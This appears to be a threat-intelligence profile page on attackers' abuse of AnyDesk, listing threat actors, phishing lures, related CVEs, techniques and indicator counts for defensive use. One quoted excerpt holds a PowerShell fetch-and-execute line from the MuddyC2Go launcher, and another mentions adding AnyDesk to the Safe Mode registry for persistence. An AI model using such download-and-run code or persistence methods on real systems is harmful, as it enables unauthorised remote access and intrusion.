AnyDesk is a legitimate remote desktop and remote administration application that is frequently abused by threat actors as a dual-use tool rather than a malware family in its own right. In intrusion activity, it is commonly deployed after initial compromise to provide direct interactive access, unattended remote control, and a resilient secondary access channel. Adversaries have used it to maintain persistence, move between systems, support command-and-control operations, facilitate hands-on-keyboard post-exploitation, and in some cases assist data theft or ransomware deployment.
Observed abuse spans financially motivated ransomware and extortion operations, cybercrime delivery chains, and state-linked espionage or false-flag activity. Reported operators and clusters associated with misuse of AnyDesk include Akira affiliates, Trigona affiliates, Scattered Spider subclusters, MuddyWater, Rare Werewolf, and North Korea-linked developer-targeting campaigns such as Contagious Interview and DeceptiveDevelopment, where BeaverTail and InvisibleFerret can download or configure AnyDesk for attacker access. It has also appeared in telephone-oriented social-engineering intrusions, Microsoft Teams vishing campaigns, spearphishing operations, and malware chains that silently configure unattended access.
Threat actors commonly deliver or install AnyDesk through phishing and spearphishing lures, fake business documents, recruiter-themed lures, fraudulent support interactions, fake diagnostic or meeting tools, and direct post-compromise deployment by other malware or operators. In several campaigns it was configured for unattended access and persistence, sometimes as a backup remote access mechanism if other tooling failed or was blocked.
When abused in compromises, AnyDesk has been used on Windows systems for persistent remote access, alternate command-and-control, lateral access support, and broader post-exploitation activity. Operators have paired it with credential theft utilities, reverse proxies, loaders, backdoors, ransomware, and exfiltration tooling. Although legitimate software, its repeated use as unauthorized remote access infrastructure makes it a common artifact in enterprise intrusions and incident response investigations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2025-31161 is a 9.8 CVSS critical severity vulnerability that affects how the CrushFTP file transfer application handles user authentication... CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass.
Hackers exploited Triofox flaw CVE-2025-12480 to bypass auth and install remote access tools via the platform’s antivirus feature.
...Fortinet FortiClient EMS... exploited... The vulnerability in question is CVE-2023-48788... SQL injection...
15 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Threat Research Team identified a targeted spear-phishing campaign using a fake aerospace-related business invoice delivered via a spoofed domain to deploy malware that silently configures AnyDesk for unattended remote access and persistence.
Threat Research Team identified a targeted spear-phishing campaign using a fake aerospace-related business invoice delivered via a spoofed domain to deploy malware that silently configures AnyDesk for unattended remote access and persistence.
Upon credential submission, victims automatically download an AnyDesk executable disguised as a “runtime diagnostics” tool, granting remote access.
AnyDesk is a popular remote desktop application that allows users to connect to computers and devices remotely... threat actors have been known to utilise AnyDesk's capabilities to control computers, therefore gaining unauthorised access to victims' systems.
AnyDesk is a popular remote desktop application that allows users to connect to computers and devices remotely... threat actors have been known to utilise AnyDesk's capabilities to control computers, therefore gaining unauthorised access to victims' systems.
AnyDesk is a popular remote desktop application that allows users to connect to computers and devices remotely... threat actors have been known to utilise AnyDesk's capabilities to control computers, therefore gaining unauthorised access to victims' systems.
16 distinct techniques documented for this family, organized by ATT&CK tactic.
The attacker also added AnyDesk to the Safe Mode registry before rebooting
Another common method observed to maintain access is by installing third-party remote access software such as AnyDesk, TeamViewer, Splashtop and Atera.
One of the more prominent instances of social engineering observed in the logs involved a call-based phishing campaign utilizing Remote Monitoring and Management (RMM) software, such as AnyDesk and TeamViewer, to access target systems and deploy malware.
The MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C&C) server... Invoke-WebRequest -Uri $uri -Method GET ... iex $response.Content;
31 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
48 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Used by the attackers as an alternate remote access channel across the network in incidents that later culminated in ransomware deployment.
AnyDesk was abused as the primary remote access payload, silently configured for unattended access and persistence to provide long-term remote control while minimizing user visibility.
Commercial remote access tool used by Scattered Spider subclusters to gain and persist initial access, often delivered immediately after phishing credential capture to support social engineering narratives.
Legitimate remote access software abused to facilitate attacker access during the intrusion.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.